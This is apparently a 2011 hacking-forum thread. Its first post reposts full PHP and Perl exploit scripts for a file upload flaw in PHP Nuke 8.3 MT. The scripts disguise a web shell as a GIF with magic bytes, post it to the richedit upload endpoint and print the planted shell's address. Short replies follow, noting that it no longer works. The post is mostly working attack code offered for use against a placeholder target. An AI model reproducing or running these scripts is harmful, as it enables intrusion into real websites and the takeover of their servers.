Zatarra Posted June 23, 2011 Report Share Posted June 23, 2011 PHP exploit:<?php /////////////////////////////////////////////////// #Iranian Pentesters Home #PHP Nuke 8.3 MT AFU Vulnerability #Coded by:4n0nym0us & b3hz4d #http://www.pentesters.ir /////////////////////////////////////////////////// //Settings: $address = 'http://your-target.com'; $file = 'shell.php.01'; $prefix='pentesters_'; //Exploit: @$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"; @$file_data .= file_get_contents($file); file_put_contents($prefix . $file, $file_data); $file = $prefix . $file; echo "\n" . "///////////////////////////////////" ."\n"; echo " Iranian Pentesters Home" . "\n"; echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n"; echo "///////////////////////////////////" ."\n"; $address_c = $address . '/includes/richedit/upload.php'; $postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1"); $data = post_data($address_c, $postdata); $start = strpos($data, "<img src=\"upload"); if ($start != null) { $data = substr($data,$start + 10); $end = strpos($data, "\""); $data = substr($data,0,$end); echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n"; } else echo "\n" . "Upload Failed!!!"; function post_data($address, $data) { $curl = curl_init($address); curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)"); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); $content = curl_exec($curl); curl_close($curl); return $content; } ?> PERL exploit#!/usr/bin/perl ################################################### #//Iranian Pentesters Home #//PHP Nuke 8.3 MT AFU Vulnerability #//Coded by:4n0nym0us & b3hz4d #//http://www.pentesters.ir ################################################### use LWP; use HTTP::Request::Common; print "\n" . "///////////////////////////////////" ."\n"; print " Iranian Pentesters Home" . "\n"; print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n"; print "///////////////////////////////////" ."\n"; print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n"; my $url = $ARGV[0]."/includes/richedit/upload.php"; my $filename = $ARGV[1]; my $prefix = $ARGV[2]; my $rfile = $prefix . $filename . ".gif"; open fhandle, $ARGV[1] or die $!; while (<fhandle>){ $shell .= $_; } close fhandle; open fhandle, ">", $rfile or die $!; print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell; close(fhandle); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026"); my $req = POST $url, Content_Type => 'form-data', Content => [ upload => "1", path => 'images', pwd => "1", userfile => [ $rfile,$prefix . $filename ] ]; my $res = $ua->request($req); $between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12); print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between); exit;Sursa: PHP Nuke 8.3 MT Shell Upload ? Packet StormVideo: Download - 213.mp4 - Persiangig Quote Link to comment Share on other sites More sharing options...
Guest expl0iter Posted June 23, 2011 Report Share Posted June 23, 2011 Thanks bro Quote Link to comment Share on other sites More sharing options...
orion.hacker Posted August 15, 2011 Report Share Posted August 15, 2011 nu mai merge:( Quote Link to comment Share on other sites More sharing options...
pr00f Posted August 15, 2011 Report Share Posted August 15, 2011 nu mai merge:(Fiindc?-i de ~ dou? luni exploit-ul . Quote Link to comment Share on other sites More sharing options...